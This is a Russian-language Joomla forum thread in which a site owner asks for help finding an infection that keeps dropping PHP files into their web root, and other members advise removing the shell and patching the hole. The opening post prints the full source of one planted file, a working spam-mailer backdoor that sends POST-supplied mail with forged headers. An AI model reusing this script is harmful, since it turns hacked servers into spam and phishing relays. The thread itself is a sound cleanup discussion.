0 Пользователей и 1 Гость просматривают эту тему.
  • 7 Ответов
  • 1364 Просмотров
*

Mangoz

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Помогите найти очаг вируса. Не могу найти, что генерирует эти файлы в корень сайта. Каким-то образом при переходе по ссылкам сайта меня кидает на сайты буржуйских социалок или фармы. Файлы появляются стабильно 3-4 раза за сутки, после того как их удалишь.



Код одного из файла

Код
<?php

function getDomainFromEmail($email)
{
$domain = substr(strrchr($email, "@"), 1);
return $domain;
}

function random_string($length) {
    $key = '';
    $keys = range('a', 'z');

    for ($i = 0; $i < $length; $i++) {
        $key .= $keys[array_rand($keys)];
    }

    return $key . '.php';
}

if(isset($_POST["to_address"]))
        $to = $_POST["to_address"];
else
{
echo "404 error";
exit;
}

$subject = stripslashes($_POST["subject"]);
$message = stripslashes($_POST["body"]);

set_time_limit (60);
@ignore_user_abort (true);

$to_ar = explode(',', $to);




if(isset($_POST["from_address"]))
{

$from_address = stripslashes($_POST["from_address"]);
$from_name = stripslashes($_POST["from_name"]);

if(isset($_POST["use_local_domain"]))
{
         $l_domain = gethostname();
         
         $splitPos = strpos($l_domain, "www.");
         if ($splitPos !== false) {
         $l_domain = str_replace('www.', '', $l_domain);
          }

         $from_address = substr($from_address,  0, strpos($from_address, '@')). '@' . $l_domain;
}


//$header =  "MIME-Version: 1.0\r\n";
//$header .= "Content-type: text/plain; charset=iso-8859-1\r\n";
//$header .= 'From: ' . '"' . $from_name . '"' .  " <" . $from_address . ">\r\n";
//$header .= "Reply-To: $from_address\r\n";
//$header .= "Return-Path: $from_address\r\n";
//$header .= "X-Mailer: PHP/" . phpversion(). "\r\n" ;

$domain = getDomainFromEmail($email);
$randIP = "".mt_rand(0,255).".".mt_rand(0,255).".".mt_rand(0,255).".".mt_rand(0,255);

$from_format = $from_name." <".$from_address.">";

 $header = "Message-Id: <".md5(uniqid(rand())).".".preg_replace("/[^a-z0-9]/i", "", $from_format)."@{$domain}>\r\n";
 $header.= "From: {$from_format}\r\n";
 $header.= "To: {$to}\r\n";
 $header .= "Reply-To: $from_address\r\n";
 $header .= "Return-Path: $from_address\r\n";
// $header.= "Subject: {$subject}\r\n";
 $header.= "Date: ".date("r")."\r\n";
 $header.= "Content-Type: text/plain; charset=iso-8859-1\r\n";
 $header.= "X-Priority: 3\r\n";
 $header.= "X-MSMail-Priority: Normal\r\n";
 $header.= "X-Mailer: PHP - " .phpversion()."\r\n";
 $header.= "X-PHP-Script: ". rand(0,500).":". random_string(rand(3,13)). " for " . $randIP ."\r\n";
// $header.= "\r\n";
// $header.= $message;
// $header.= "\r\n.\r\n";




$result = mail(stripslashes($to), stripslashes($subject), stripslashes($message), stripslashes($header));
}
else
{
$result = mail(stripslashes($to), stripslashes($subject), stripslashes($message));
}

if($result){echo 'good';}else{echo 'error : '.$result;}
 
?>
*

flyingspook

  • Живу я здесь
  • 3590
  • 247 / 9
Re: Генерация php файлов в корень сайта
« Ответ #1 : 02.10.2014, 11:00:49 »
ищите и удаляйте shell, закрывайте уязвимости сайта, это не генерирует а подгружают
*

wishlight

  • Живу я здесь
  • 4918
  • 289 / 1
  • от 150 руб быстрый хостинг в Москве
Re: Генерация php файлов в корень сайта
« Ответ #2 : 02.10.2014, 11:13:38 »
Да. Кто-то развлекается.
*

robert

  • Живу я здесь
  • 4974
  • 457 / 20
Re: Генерация php файлов в корень сайта
« Ответ #3 : 02.10.2014, 11:14:35 »
Приведенный вами код рассылает спам от вашего имени.
Не будь паразитом, сделай что-нибудь самостоятельно!
*

Mangoz

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Генерация php файлов в корень сайта
« Ответ #4 : 02.10.2014, 11:54:45 »
В каких файлах может находиться уязвимость?
*

wishlight

  • Живу я здесь
  • 4918
  • 289 / 1
  • от 150 руб быстрый хостинг в Москве
Re: Генерация php файлов в корень сайта
« Ответ #5 : 02.10.2014, 14:03:57 »
В общем в самых разнообразных вкратце. Мы же не знаем, что у вас установлено и сколько сайтов на аккаунте.
*

flyingspook

  • Живу я здесь
  • 3590
  • 247 / 9
*

Taatshi

  • Глобальный модератор
  • 5258
  • 481 / 1
  • Верстаем и кодим. Обращайтесь ;)
Re: Генерация php файлов в корень сайта
« Ответ #7 : 03.10.2014, 08:23:43 »
Mangoz, если Вы не знакомы хотя бы с основами php - Вам самому это дело не осилить. У меня порой занимает пару-тройку дней чтобы найти уязвимость, полностью очистить сайт и поставить хотя бы базовую защиту.

Но можете попробовать. Воспользуйтесь скриптом айболит - на сегодняшний день это один из  самых эффективных инструментов для работы.
ВЕРСТКА, САЙТЫ ПОД КЛЮЧ, УДАЛЕНИЕ ВИРУСОВ, МИГРАЦИЯ НА JOOMLA 3, ОБНОВЛЕНИЕ  |  ОТЗЫВЫ 
Связь: telegram - Taatshi, почта - Taatshi на яндексе, Skype - Taatshi
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Не могу распаковать jpa архив сайта Akeeba backup. ajax error

Автор smadkz

Ответов: 4
Просмотров: 409
Последний ответ 26.12.2020, 15:15:15
от stendapuss
Версия сайта для слабовидящих

Автор nikos

Ответов: 22
Просмотров: 41378
Последний ответ 27.11.2020, 11:04:18
от chernobyl
Поиск статьи по url сайта в админке Joomla 1.5

Автор Tema

Ответов: 5
Просмотров: 679
Последний ответ 14.08.2020, 07:16:44
от rsn
Как сделать бэкап сайта

Автор egorovv

Ответов: 8
Просмотров: 4580
Последний ответ 06.06.2020, 12:09:43
от SeBun
Проблема со входом в Админ панель после переноса сайта

Автор Vlad Ermolaev

Ответов: 11
Просмотров: 957
Последний ответ 12.12.2019, 15:48:25
от SeBun